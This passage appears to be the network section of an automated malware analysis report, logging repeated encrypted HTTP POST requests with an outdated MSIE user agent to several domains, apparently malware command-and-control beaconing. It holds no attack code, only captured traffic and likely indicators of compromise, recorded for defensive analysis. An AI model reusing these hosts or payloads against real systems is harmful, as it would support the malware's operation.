pOTqaSx0lg3TJKw6F2GoNz+oAq+EJHTPIHDQlAeHFunGljI7xXqUx0OxeWNGEO/W/0+X6oH4Esn/inAWGBahvOr7Ne5zH3D1Yjp/cDxo8r1kgFe6Iyqeh6Z6QeO2BnkzWmmNNm0u6rnw8d8VKeqUWUm7r9ufX/fkuzuzCGVZhFjrxeDeFQZRWIH0Uty+L1TiLAvMTm+5uBmViF/KeUnai6oRBe2CPTrP+JUVY3WQeeZlPM6ltnrqDs3GZp7YhQ0RuqWn5UCU1FW0Y1g1EaE/Froo9wuXKMqZ0OeuJguq4iW0sDUkqr6FMxXiHwPBPB+BhUvzW5fCy6/bzk/i4rl5Sx+I1vxkJhxyioxJ8f/SU+8jqhP05pMBKwYeNfcMg6Ek3+X/f2dkJj9snBX1YBemRXtku8hHiuXt66j/tE6mgGT6K/LxtseAL/9XDH51zAt4E0MdYgLJf3NLC8zzjaRQ2egyqYYNbOTz92soPebnz5jWzkhrEJMKRhc9gwkqKjT6FtR8Z2m1tJIWNUrp2c1sh8vDKxY9o+0yTo9wW75xlM/quB6ZPA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 31 4b 43 2b 61 62 78 79 6c 67 31 39 45 30 6f 5a 5a 36 34 6c 45 30 39 31 2f 55 31 55 66 6e 58 57 73 46 65 54 39 52 4a 4b 4c 6a 4d 73 54 51 75 62 4b 62 72 4a 69 4c 79 75 35 75 54 38 41 54 59 37 50 30 35 32 66 68 30 2b 4b 6e 54 43 45 4f 4b 63 51 46 41 63 74 6f 79 52 69 36 76 69 32 6c 72 41 53 51 48 4c 4a 4d 6d 4e 79 57 69 35 55 72 5a 33 78 4a 66 65 33 2b 62 69 72 71 79 51 41 33 6b 57 37 72 51 4b 78 4f 58 4d 44 66 5a 35 4e 65 57 41 43 45 36 72 30 47 72 64 53 6b 66 38 35 46 73 72 46 55 37 54 69 4b 72 47 71 49 53 47 2f 37 4f 45 35 6e 68 73 45 63 70 74 63 70 62 2b 70 6d 51 34 6a 56 32 45 58 31 4d 64 50 77 66 63 4c 59 50 57 73 59 6a 50 4c 4b 4c 31 4c 58 67 39 4c 66 77 49 61 31 62 48 75 4b 6b 41 61 36 30 46 6a 50 36 57 37 72 52 6d 4d 30 62 54 54 66 49 35 34 33 41 32 75 7a 69 32 66 37 52 79 5a 32 2f 46 53 4f 73 6e 4d 45 6c 71 41 6e 4c 48 34 62 76 45 66 68 49 35 31 38 47 76 6e 57 6e 5a 6c 30 70 6b 68 33 43 6c 50 76 75 69 31 61 68 65 37 37 5a 65 37 34 46 6f 50 2f 73 6a 78 35 69 6f 38 46 6d 74 67 52 42 77 33 45 73 38 49 30 56 53 4d 71 33 41 67 72 69 76 53 6e 2b 79 33 2b 2f 45 6f 77 55 42 2f 56 6d 58 51 4c 42 48 5a 71 74 66 46 4c 4a 32 34 63 74 59 65 51 46 66 6e 6b 55 6c 64 58 52 37 6e 30 49 51 64 63 55 32 6b 4b 6e 70 4d 59 58 7a 55 44 38 50 2f 35 39 72 44 75 48 35 38 58 79 53 55 39 37 34 68 48 47 4a 54 72 73 45 50 38 4e 50 52 2b 62 4d 56 66 34 46 75 4e 51 47 76 54 79 75 42 7a 32 6d 53 4c 65 6f 64 4f 2b 66 57 74 51 4b 4f 66 4b 5a 56 70 68 46 35 45 63 7a 6e 48 35 6c 71 74 45 67 46 66 6d 42 31 61 53 50 6f 4d 72 4d 6f 4c 79 43 79 42 4b 70 72 33 4d 33 72 6e 4d 54 71 76 63 67 34 4e 62 34 49 54 38 45 55 57 66 41 32 68 30 50 48 52 35 55 6d 70 31 4b 52 78 50 62 66 6c 2b 42 Data Ascii: 1KC+abxylg19E0oZZ64lE091/U1UfnXWsFeT9RJKLjMsTQubKbrJiLyu5uT8ATY7P052fh0+KnTCEOKcQFActoyRi6vi2lrASQHLJMmNyWi5UrZ3xJfe3+birqyQA3kW7rQKxOXMDfZ5NeWACE6r0GrdSkf85FsrFU7TiKrGqISG/7OE5nhsEcptcpb+pmQ4jV2EX1MdPwfcLYPWsYjPLKL1LXg9LfwIa1bHuKkAa60FjP6W7rRmM0bTTfI543A2uzi2f7RyZ2/FSOsnMElqAnLH4bvEfhI518GvnWnZl0pkh3ClPvui1ahe77Ze74FoP/sjx5io8FmtgRBw3Es8I0VSMq3AgrivSn+y3+/EowUB/VmXQLBHZqtfFLJ24ctYeQFfnkUldXR7n0IQdcU2kKnpMYXzUD8P/59rDuH58XySU974hHGJTrsEP8NPR+bMVf4FuNQGvTyuBz2mSLeodO+fWtQKOfKZVphF5EcznH5lqtEgFfmB1aSPoMrMoLyCyBKpr3M3rnMTqvcg4Nb4IT8EUWfA2h0PHR5Ump1KRxPbfl+B
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 70 4f 54 71 61 53 78 30 6c 67 33 54 4a 4b 77 36 46 32 47 6f 4e 7a 2b 6f 41 71 2b 45 4a 48 54 50 49 48 44 51 6c 41 65 48 46 75 6e 47 6c 6a 49 37 78 58 71 55 78 30 4f 78 65 57 4e 47 45 4f 2f 57 2f 30 2b 58 36 6f 48 34 45 73 6e 2f 69 6e 41 57 47 42 61 68 76 4f 72 37 4e 65 35 7a 48 33 44 31 59 6a 70 2f 63 44 78 6f 38 72 31 6b 67 46 65 36 49 79 71 65 68 36 5a 36 51 65 4f 32 42 6e 6b 7a 57 6d 6d 4e 4e 6d 30 75 36 72 6e 77 38 64 38 56 4b 65 71 55 57 55 6d 37 72 39 75 66 58 2f 66 6b 75 7a 75 7a 43 47 56 5a 68 46 6a 72 78 65 44 65 46 51 5a 52 57 49 48 30 55 74 79 2b 4c 31 54 69 4c 41 76 4d 54 6d 2b 35 75 42 6d 56 69 46 2f 4b 65 55 6e 61 69 36 6f 52 42 65 32 43 50 54 72 50 2b 4a 55 56 59 33 57 51 65 65 5a 6c 50 4d 36 6c 74 6e 72 71 44 73 33 47 5a 70 37 59 68 51 30 52 75 71 57 6e 35 55 43 55 31 46 57 30 59 31 67 31 45 61 45 2f 46 72 6f 6f 39 77 75 58 4b 4d 71 5a 30 4f 65 75 4a 67 75 71 34 69 57 30 73 44 55 6b 71 72 36 46 4d 78 58 69 48 77 50 42 50 42 2b 42 68 55 76 7a 57 35 66 43 79 36 2f 62 7a 6b 2f 69 34 72 6c 35 53 78 2b 49 31 76 78 6b 4a 68 78 79 69 6f 78 4a 38 66 2f 53 55 2b 38 6a 71 68 50 30 35 70 4d 42 4b 77 59 65 4e 66 63 4d 67 36 45 6b 33 2b 58 2f 66 32 64 6b 4a 6a 39 73 6e 42 58 31 59 42 65 6d 52 58 74 6b 75 38 68 48 69 75 58 74 36 36 6a 2f 74 45 36 6d 67 47 54 36 4b 2f 4c 78 74 73 65 41 4c 2f 39 58 44 48 35 31 7a 41 74 34 45 30 4d 64 59 67 4c 4a 66 33 4e 4c 43 38 7a 7a 6a 61 52 51 32 65 67 79 71 59 59 4e 62 4f 54 7a 39 32 73 6f 50 65 62 6e 7a 35 6a 57 7a 6b 68 72 45 4a 4d 4b 52 68 63 39 67 77 6b 71 4b 6a 54 36 46 74 52 38 5a 32 6d 31 74 4a 49 57 4e 55 72 70 32 63 31 73 68 38 76 44 4b 78 59 39 6f 2b 30 79 54 6f 39 77 57 37 35 78 6c 4d 2f 71 75 42 36 5a 50 41 3d 3d Data Ascii: pOTqaSx0lg3TJKw6F2GoNz+oAq+EJHTPIHDQlAeHFunGljI7xXqUx0OxeWNGEO/W/0+X6oH4Esn/inAWGBahvOr7Ne5zH3D1Yjp/cDxo8r1kgFe6Iyqeh6Z6QeO2BnkzWmmNNm0u6rnw8d8VKeqUWUm7r9ufX/fkuzuzCGVZhFjrxeDeFQZRWIH0Uty+L1TiLAvMTm+5uBmViF/KeUnai6oRBe2CPTrP+JUVY3WQeeZlPM6ltnrqDs3GZp7YhQ0RuqWn5UCU1FW0Y1g1EaE/Froo9wuXKMqZ0OeuJguq4iW0sDUkqr6FMxXiHwPBPB+BhUvzW5fCy6/bzk/i4rl5Sx+I1vxkJhxyioxJ8f/SU+8jqhP05pMBKwYeNfcMg6Ek3+X/f2dkJj9snBX1YBemRXtku8hHiuXt66j/tE6mgGT6K/LxtseAL/9XDH51zAt4E0MdYgLJf3NLC8zzjaRQ2egyqYYNbOTz92soPebnz5jWzkhrEJMKRhc9gwkqKjT6FtR8Z2m1tJIWNUrp2c1sh8vDKxY9o+0yTo9wW75xlM/quB6ZPA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=mmikjcccpacmhhypnhsmmibzvjxnzchh; _mcnc=1Data Raw: 49 62 50 6a 41 41 2f 4b 63 51 32 4f 58 32 2f 6f 72 6a 41 76 2f 52 6a 7a 55 35 69 6c 54 7a 50 32 73 2b 72 58 2f 51 64 74 47 4e 39 61 73 78 51 78 42 39 31 69 38 52 74 66 58 6e 37 45 30 2f 49 66 33 6c 35 39 56 7a 69 45 68 6f 71 50 49 33 70 33 45 46 78 46 30 43 36 79 70 64 34 4b 5a 6e 36 43 74 7a 43 55 55 37 45 4f 45 62 75 56 46 63 4d 61 4e 5a 74 57 4f 36 6c 65 63 4c 31 5a 58 50 5a 44 4b 43 61 47 6a 52 61 62 41 5a 58 68 41 56 7a 37 73 5a 59 53 41 4c 48 49 2b 42 51 4e 6f 45 70 52 42 2b 39 75 58 79 67 67 50 51 39 63 45 6f 64 57 4d 35 4c 69 51 67 6b 52 6d 31 72 46 2b 48 7a 4a 47 69 76 61 7a 74 4c 70 4e 68 41 33 66 35 41 49 6e 4d 43 49 53 2b 78 70 69 5a 70 61 2f 34 79 4f 2b 49 76 68 33 66 34 51 6d 35 4b 35 67 78 2b 2f 38 58 45 39 54 77 34 35 71 4f 62 51 71 5a 61 39 55 2b 6c 70 6f 5a 59 73 70 56 38 68 56 46 65 6f 6c 61 51 56 4b 58 31 68 75 4a 52 6e 74 70 48 74 63 36 51 68 4b 51 31 70 36 43 56 2f 57 69 76 62 70 70 41 41 31 6f 71 4d 4b 37 6b 77 6e 35 53 44 73 52 47 54 6b 57 72 70 75 2f 66 68 79 64 6f 4a 51 2b 63 2f 5a 56 58 62 32 70 4f 31 39 50 75 49 6e 55 33 56 70 63 66 37 4f 79 54 79 46 48 68 39 35 31 43 79 73 59 5a 6a 46 4f 48 34 72 59 69 6a 55 2b 67 67 6e 34 4b 69 66 71 69 79 33 7a 63 6c 6d 47 6d 4c 61 75 76 74 58 6b 6a 37 70 59 6d 67 30 31 4d 45 30 47 6d 34 68 39 6d 78 7a 66 4a 62 6e 63 66 6a 54 58 6b 4f 6e 4b 77 37 52 4e 5a 52 58 55 56 79 67 78 47 6c 6e 7a 45 4a 34 53 35 6e 72 39 79 50 6f 52 6f 72 6a 4e 79 36 61 50 77 79 50 52 48 2b 48 6a 2f 7a 65 49 38 35 79 6e 62 42 78 4a 7a 50 4e 38 6d 59 6a 55 6c 7a 48 63 72 53 44 41 69 61 67 4c 4a 67 37 78 78 2f 67 57 49 63 63 2b 45 63 7a 4d 52 67 54 41 4d 41 7a 71 59 62 63 2b 4d 4f 71 69 43 52 55 61 6b 41 39 39 61 75 76 73 35 79 2b 62 37 37 56 58 74 30 66 50 42 38 4e 68 2b 72 79 54 49 3d Data Ascii: IbPjAA/KcQ2OX2/orjAv/RjzU5ilTzP2s+rX/QdtGN9asxQxB91i8RtfXn7E0/If3l59VziEhoqPI3p3EFxF0C6ypd4KZn6CtzCUU7EOEbuVFcMaNZtWO6lecL1ZXPZDKCaGjRabAZXhAVz7sZYSALHI+BQNoEpRB+9uXyggPQ9cEodWM5LiQgkRm1rF+HzJGivaztLpNhA3f5AInMCIS+xpiZpa/4yO+Ivh3f4Qm5K5gx+/8XE9Tw45qObQqZa9U+lpoZYspV8hVFeolaQVKX1huJRntpHtc6QhKQ1p6CV/WivbppAA1oqMK7kwn5SDsRGTkWrpu/fhydoJQ+c/ZVXb2pO19PuInU3Vpcf7OyTyFHh951CysYZjFOH4rYijU+ggn4Kifqiy3zclmGmLauvtXkj7pYmg01ME0Gm4h9mxzfJbncfjTXkOnKw7RNZRXUVygxGlnzEJ4S5nr9yPoRorjNy6aPwyPRH+Hj/zeI85ynbBxJzPN8mYjUlzHcrSDAiagLJg7xx/gWIcc+EczMRgTAMAzqYbc+MOqiCRUakA99auvs5y+b77VXt0fPB8Nh+ryTI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 4f 2b 79 55 61 42 4a 70 6c 67 33 2b 43 73 66 74 78 58 57 78 48 52 58 38 54 65 64 69 75 70 54 65 5a 72 42 38 59 54 53 4b 31 48 33 46 56 4d 65 4a 4c 67 6c 46 31 64 32 4a 50 75 48 30 79 63 6c 4c 51 4f 46 44 64 31 58 78 5a 72 72 51 54 38 39 33 38 71 6f 37 50 4c 69 56 4d 63 38 4b 70 58 72 39 33 62 43 74 35 34 53 44 52 43 71 48 49 7a 54 30 71 63 39 57 2b 6f 4c 59 77 46 67 70 34 58 53 30 6d 51 46 70 57 73 69 47 5a 53 44 6f 6b 6b 70 2f 63 2b 58 5a 48 52 42 36 76 53 78 4e 4d 69 79 6b 69 42 51 43 57 31 61 5a 77 4b 47 31 65 37 6b 70 73 64 51 6d 47 4a 37 62 62 62 32 62 6b 6c 46 59 51 31 4e 76 59 31 38 6f 4a 6b 4a 49 48 70 32 61 30 43 48 63 69 4d 46 78 59 55 62 4a 61 55 73 6f 65 51 6d 77 61 4f 56 55 38 4a 6a 76 34 69 4e 33 74 78 57 59 70 33 38 66 46 34 54 4f 6b 38 32 49 56 69 36 4c 71 62 36 4d 50 58 6f 52 32 6f 49 69 46 44 7a 6b 62 59 72 59 6a 4f 64 37 47 79 72 66 2b 34 67 52 49 47 6e 44 41 69 52 49 4d 64 4b 30 63 78 34 64 68 49 63 65 6e 52 6e 47 64 66 57 47 6a 61 44 4f 4f 47 53 45 6d 6e 2f 32 48 6b 77 4c 39 4f 48 42 74 56 6a 68 53 43 78 6c 41 39 41 49 31 78 54 48 61 34 56 4e 62 37 76 38 4c 48 2b 68 67 36 4d 6e 4f 47 6c 6e 5a 79 38 6c 59 36 67 78 70 32 62 6a 77 62 2f 6c 6a 74 6e 79 6e 79 52 76 4f 75 6e 58 30 49 56 57 79 4e 68 6a 38 42 52 67 33 43 52 4e 4e 37 6c 6a 46 70 6a 7a 35 33 45 49 58 68 2b 43 53 6b 69 57 55 4f 49 46 39 42 5a 63 2f 46 75 62 79 30 7a 69 6c 6a 6e 79 56 73 48 44 63 66 42 52 62 54 6d 6f 58 30 69 71 71 53 38 6a 36 4c 37 50 4c 4c 4e 42 41 61 50 4b 50 37 56 6a 6f 65 51 70 4f 74 36 4f 47 58 33 4f 41 32 47 4b 6c 61 56 6e 65 66 52 6d 74 4a 71 58 52 62 4b 58 6d 61 78 32 69 52 67 37 4d 35 4d 56 47 69 4a 7a 68 6a 2f 35 32 78 69 73 34 67 3d 3d Data Ascii: O+yUaBJplg3+CsftxXWxHRX8TediupTeZrB8YTSK1H3FVMeJLglF1d2JPuH0yclLQOFDd1XxZrrQT8938qo7PLiVMc8KpXr93bCt54SDRCqHIzT0qc9W+oLYwFgp4XS0mQFpWsiGZSDokkp/c+XZHRB6vSxNMiykiBQCW1aZwKG1e7kpsdQmGJ7bbb2bklFYQ1NvY18oJkJIHp2a0CHciMFxYUbJaUsoeQmwaOVU8Jjv4iN3txWYp38fF4TOk82IVi6Lqb6MPXoR2oIiFDzkbYrYjOd7Gyrf+4gRIGnDAiRIMdK0cx4dhIcenRnGdfWGjaDOOGSEmn/2HkwL9OHBtVjhSCxlA9AI1xTHa4VNb7v8LH+hg6MnOGlnZy8lY6gxp2bjwb/ljtnynyRvOunX0IVWyNhj8BRg3CRNN7ljFpjz53EIXh+CSkiWUOIF9BZc/Fuby0ziljnyVsHDcfBRbTmoX0iqqS8j6L7PLLNBAaPKP7VjoeQpOt6OGX3OA2GKlaVnefRmtJqXRbKXmax2iRg7M5MVGiJzhj/52xis4g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 67 43 75 70 67 4c 7a 52 70 77 31 63 75 79 54 34 5a 34 48 68 52 6b 38 73 6d 56 39 55 43 55 65 6c 73 47 59 6a 6b 34 4d 75 2b 44 4e 52 43 36 64 36 4c 58 6c 63 77 37 68 6c 67 39 2f 46 2b 4c 52 46 59 5a 47 75 57 73 43 76 53 2b 6a 78 34 70 2b 31 38 4b 39 62 6e 31 41 77 65 66 4f 36 74 34 55 35 69 46 63 4f 63 44 69 38 55 50 55 31 44 2b 63 6d 64 6c 5a 6e 62 63 70 34 61 78 43 72 4f 55 5a 53 6f 4d 48 64 2f 4f 75 35 48 4b 4b 74 46 48 51 65 36 57 2f 44 65 4b 78 36 46 30 79 4f 53 46 6c 6b 4d 43 44 32 63 67 43 4b 39 4b 62 4c 37 2b 30 30 53 4b 4e 5a 64 33 6d 6e 33 57 59 6c 38 53 54 36 75 30 4b 2b 6f 51 7a 76 69 33 44 47 6e 32 71 68 4e 72 72 6b 44 35 58 67 78 32 66 72 49 67 36 52 4b 54 63 5a 41 32 4a 64 33 70 6a 31 62 76 2f 50 58 41 57 4a 52 6e 38 43 50 71 67 4f 49 6f 4f 38 59 4d 78 51 6f 62 47 62 4b 4a 2f 56 43 4c 30 4e 6f 78 73 47 6e 63 61 39 4e 78 70 33 51 4b 4b 67 71 5a 37 6f 44 6d 33 6e 77 36 46 64 2f 74 4c 79 47 2f 41 44 77 47 59 2b 79 2b 35 55 39 50 4a 58 41 6d 67 73 76 2f 70 6d 59 70 6f 49 36 6d 79 51 4c 63 50 47 35 45 55 59 6c 69 49 5a 4e 68 6b 6c 70 58 46 50 2b 6e 38 64 43 4e 57 66 41 35 6d 55 32 4b 6d 41 6d 35 70 70 4e 62 44 55 55 39 33 33 71 33 4d 4d 70 2b 6f 46 38 75 4d 79 49 6e 62 4a 38 32 36 76 69 7a 30 51 34 7a 76 5a 30 76 77 2b 4e 6f 2b 4c 38 5a 4a 47 4c 61 6b 52 78 44 78 51 56 69 75 66 78 65 61 51 76 53 62 62 59 62 79 55 31 68 50 76 47 42 72 6d 36 68 34 33 6d 44 30 2b 41 72 69 39 70 55 31 49 34 62 6c 4c 67 58 69 6c 57 57 46 38 47 63 57 49 34 31 79 51 46 2f 66 30 5a 2b 53 31 78 4d 7a 6a 42 56 6b 62 49 4c 45 56 45 47 78 34 68 4f 2f 54 4d 38 72 67 58 38 2b 52 36 30 79 56 44 2f 58 4b 44 57 56 76 55 4e 30 6c 78 32 6d 41 74 77 3d 3d Data Ascii: gCupgLzRpw1cuyT4Z4HhRk8smV9UCUelsGYjk4Mu+DNRC6d6LXlcw7hlg9/F+LRFYZGuWsCvS+jx4p+18K9bn1AwefO6t4U5iFcOcDi8UPU1D+cmdlZnbcp4axCrOUZSoMHd/Ou5HKKtFHQe6W/DeKx6F0yOSFlkMCD2cgCK9KbL7+00SKNZd3mn3WYl8ST6u0K+oQzvi3DGn2qhNrrkD5Xgx2frIg6RKTcZA2Jd3pj1bv/PXAWJRn8CPqgOIoO8YMxQobGbKJ/VCL0NoxsGnca9Nxp3QKKgqZ7oDm3nw6Fd/tLyG/ADwGY+y+5U9PJXAmgsv/pmYpoI6myQLcPG5EUYliIZNhklpXFP+n8dCNWfA5mU2KmAm5ppNbDUU933q3MMp+oF8uMyInbJ826viz0Q4zvZ0vw+No+L8ZJGLakRxDxQViufxeaQvSbbYbyU1hPvGBrm6h43mD0+Ari9pU1I4blLgXilWWF8GcWI41yQF/f0Z+S1xMzjBVkbILEVEGx4hO/TM8rgX8+R60yVD/XKDWVvUN0lx2mAtw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 67 43 75 70 67 4c 7a 52 70 77 31 63 75 79 54 34 5a 34 48 68 52 6b 38 73 6d 56 39 55 43 55 65 6c 73 47 59 6a 6b 34 4d 75 2b 44 4e 52 43 36 64 36 4c 58 6c 63 77 37 68 6c 67 39 2f 46 2b 4c 52 46 59 5a 47 75 57 73 43 76 53 2b 6a 78 34 70 2b 31 38 4b 39 62 6e 31 41 77 65 66 4f 36 74 34 55 35 69 46 63 4f 63 44 69 38 55 50 55 31 44 2b 63 6d 64 6c 5a 6e 62 63 70 34 61 78 43 72 4f 55 5a 53 6f 4d 48 64 2f 4f 75 35 48 4b 4b 74 46 48 51 65 36 57 2f 44 65 4b 78 36 46 30 79 4f 53 46 6c 6b 4d 43 44 32 63 67 43 4b 39 4b 62 4c 37 2b 30 30 53 4b 4e 5a 64 33 6d 6e 33 57 59 6c 38 53 54 36 75 30 4b 2b 6f 51 7a 76 69 33 44 47 6e 32 71 68 4e 72 72 6b 44 35 58 67 78 32 66 72 49 67 36 52 4b 54 63 5a 41 32 4a 64 33 70 6a 31 62 76 2f 50 58 41 57 4a 52 6e 38 43 50 71 67 4f 49 6f 4f 38 59 4d 78 51 6f 62 47 62 4b 4a 2f 56 43 4c 30 4e 6f 78 73 47 6e 63 61 39 4e 78 70 33 51 4b 4b 67 71 5a 37 6f 44 6d 33 6e 77 36 46 64 2f 74 4c 79 47 2f 41 44 77 47 59 2b 79 2b 35 55 39 50 4a 58 41 6d 67 73 76 2f 70 6d 59 70 6f 49 36 6d 79 51 4c 63 50 47 35 45 55 59 6c 69 49 5a 4e 68 6b 6c 70 58 46 50 2b 6e 38 64 43 4e 57 66 41 35 6d 55 32 4b 6d 41 6d 35 70 70 4e 62 44 55 55 39 33 33 71 33 4d 4d 70 2b 6f 46 38 75 4d 79 49 6e 62 4a 38 32 36 76 69 7a 30 51 34 7a 76 5a 30 76 77 2b 4e 6f 2b 4c 38 5a 4a 47 4c 61 6b 52 78 44 78 51 56 69 75 66 78 65 61 51 76 53 62 62 59 62 79 55 31 68 50 76 47 42 72 6d 36 68 34 33 6d 44 30 2b 41 72 69 39 70 55 31 49 34 62 6c 4c 67 58 69 6c 57 57 46 38 47 63 57 49 34 31 79 51 46 2f 66 30 5a 2b 53 31 78 4d 7a 6a 42 56 6b 62 49 4c 45 56 45 47 78 34 68 4f 2f 54 4d 38 72 67 58 38 2b 52 36 30 79 56 44 2f 58 4b 44 57 56 76 55 4e 30 6c 78 32 6d 41 74 77 3d 3d Data Ascii: gCupgLzRpw1cuyT4Z4HhRk8smV9UCUelsGYjk4Mu+DNRC6d6LXlcw7hlg9/F+LRFYZGuWsCvS+jx4p+18K9bn1AwefO6t4U5iFcOcDi8UPU1D+cmdlZnbcp4axCrOUZSoMHd/Ou5HKKtFHQe6W/DeKx6F0yOSFlkMCD2cgCK9KbL7+00SKNZd3mn3WYl8ST6u0K+oQzvi3DGn2qhNrrkD5Xgx2frIg6RKTcZA2Jd3pj1bv/PXAWJRn8CPqgOIoO8YMxQobGbKJ/VCL0NoxsGnca9Nxp3QKKgqZ7oDm3nw6Fd/tLyG/ADwGY+y+5U9PJXAmgsv/pmYpoI6myQLcPG5EUYliIZNhklpXFP+n8dCNWfA5mU2KmAm5ppNbDUU933q3MMp+oF8uMyInbJ826viz0Q4zvZ0vw+No+L8ZJGLakRxDxQViufxeaQvSbbYbyU1hPvGBrm6h43mD0+Ari9pU1I4blLgXilWWF8GcWI41yQF/f0Z+S1xMzjBVkbILEVEGx4hO/TM8rgX8+R60yVD/XKDWVvUN0lx2mAtw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 59 54 70 34 61 73 4e 34 6c 67 31 34 74 51 2f 54 79 73 63 37 72 4f 7a 33 73 30 4a 70 74 72 4e 58 70 77 70 57 45 32 42 4c 48 36 44 47 57 36 32 35 57 56 4b 66 74 6f 52 42 76 43 57 41 37 79 4e 50 37 50 65 5a 62 6e 39 6a 71 31 58 71 31 41 74 34 4f 42 48 6a 58 65 78 4d 51 62 30 35 2b 41 74 46 70 75 4d 41 71 4e 72 70 38 72 4c 2b 4e 32 51 51 47 6a 69 6a 70 43 5a 6f 58 4e 7a 32 79 42 45 7a 56 45 50 71 74 4b 32 78 77 30 4c 35 7a 6e 73 76 52 6a 49 51 41 42 72 34 61 6c 61 75 4a 53 69 74 61 77 7a 6d 34 77 55 6a 37 77 35 77 66 67 74 48 50 59 69 35 52 5a 58 6d 72 68 68 74 2f 6c 6e 57 70 53 67 62 30 63 6f 79 36 6c 4e 68 42 6d 66 74 51 4b 41 45 51 37 4f 7a 7a 34 33 58 75 71 42 4a 65 74 52 72 6c 4e 59 58 35 4d 71 70 39 36 2f 50 4a 54 76 6a 57 74 32 78 59 42 32 65 65 62 38 49 43 31 36 34 65 67 45 66 46 78 35 38 6c 2f 46 71 54 45 50 6c 78 50 73 67 53 55 39 35 63 53 56 68 67 4e 75 58 45 63 74 2b 68 67 50 4c 65 6f 45 4f 62 37 77 30 50 61 47 4a 74 4d 72 50 6a 6f 31 74 2b 2f 68 66 79 41 34 35 57 49 2f 61 4b 43 6c 69 38 7a 6c 6a 4e 75 39 65 51 6e 77 6f 30 73 6e 6a 34 79 31 70 53 64 61 74 47 74 66 32 6a 6a 45 41 42 58 73 6b 78 75 44 63 51 42 30 36 7a 63 63 4e 6e 71 53 56 67 51 30 31 2b 75 4a 55 36 4a 73 56 6e 37 7a 66 79 76 76 54 44 6d 62 4b 53 7a 6c 31 70 37 72 66 6c 5a 53 4d 65 71 57 6c 35 54 41 2b 56 35 55 33 62 43 42 41 6d 64 59 34 7a 7a 76 64 4a 71 54 37 36 45 2b 72 78 51 55 2f 48 6b 38 41 52 39 57 45 6c 70 44 37 37 49 67 6b 53 53 2f 49 6b 4b 4b 34 35 77 52 79 51 65 61 79 59 6d 49 31 69 55 76 54 68 4d 73 37 53 73 53 52 4f 78 45 70 38 5a 2f 59 50 6d 57 51 64 77 30 41 64 67 44 38 44 6b 6d 7a 41 62 68 68 57 31 37 63 70 46 50 46 2b 6a 65 66 53 41 53 32 43 38 38 42 71 6b 64 34 70 38 63 63 76 68 63 77 48 45 77 3d Data Ascii: YTp4asN4lg14tQ/Tysc7rOz3s0JptrNXpwpWE2BLH6DGW625WVKftoRBvCWA7yNP7PeZbn9jq1Xq1At4OBHjXexMQb05+AtFpuMAqNrp8rL+N2QQGjijpCZoXNz2yBEzVEPqtK2xw0L5znsvRjIQABr4alauJSitawzm4wUj7w5wfgtHPYi5RZXmrhht/lnWpSgb0coy6lNhBmftQKAEQ7Ozz43XuqBJetRrlNYX5Mqp96/PJTvjWt2xYB2eeb8IC164egEfFx58l/FqTEPlxPsgSU95cSVhgNuXEct+hgPLeoEOb7w0PaGJtMrPjo1t+/hfyA45WI/aKCli8zljNu9eQnwo0snj4y1pSdatGtf2jjEABXskxuDcQB06zccNnqSVgQ01+uJU6JsVn7zfyvvTDmbKSzl1p7rflZSMeqWl5TA+V5U3bCBAmdY4zzvdJqT76E+rxQU/Hk8AR9WElpD77IgkSS/IkKK45wRyQeayYmI1iUvThMs7SsSROxEp8Z/YPmWQdw0AdgD8DkmzAbhhW17cpFPF+jefSAS2C88Bqkd4p8ccvhcwHEw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 4f 2b 79 55 61 42 4a 70 6c 67 33 2b 43 73 66 74 78 58 57 78 48 52 58 38 54 65 64 69 75 70 54 65 5a 72 42 38 59 54 53 4b 31 48 33 46 56 4d 65 4a 4c 67 6c 46 31 64 32 4a 50 75 48 30 79 63 6c 4c 51 4f 46 44 64 31 58 78 5a 72 72 51 54 38 39 33 38 71 6f 37 50 4c 69 56 4d 63 38 4b 70 58 72 39 33 62 43 74 35 34 53 44 52 43 71 48 49 7a 54 30 71 63 39 57 2b 6f 4c 59 77 46 67 70 34 58 53 30 6d 51 46 70 57 73 69 47 5a 53 44 6f 6b 6b 70 2f 63 2b 58 5a 48 52 42 36 76 53 78 4e 4d 69 79 6b 69 42 51 43 57 31 61 5a 77 4b 47 31 65 37 6b 70 73 64 51 6d 47 4a 37 62 62 62 32 62 6b 6c 46 59 51 31 4e 76 59 31 38 6f 4a 6b 4a 49 48 70 32 61 30 43 48 63 69 4d 46 78 59 55 62 4a 61 55 73 6f 65 51 6d 77 61 4f 56 55 38 4a 6a 76 34 69 4e 33 74 78 57 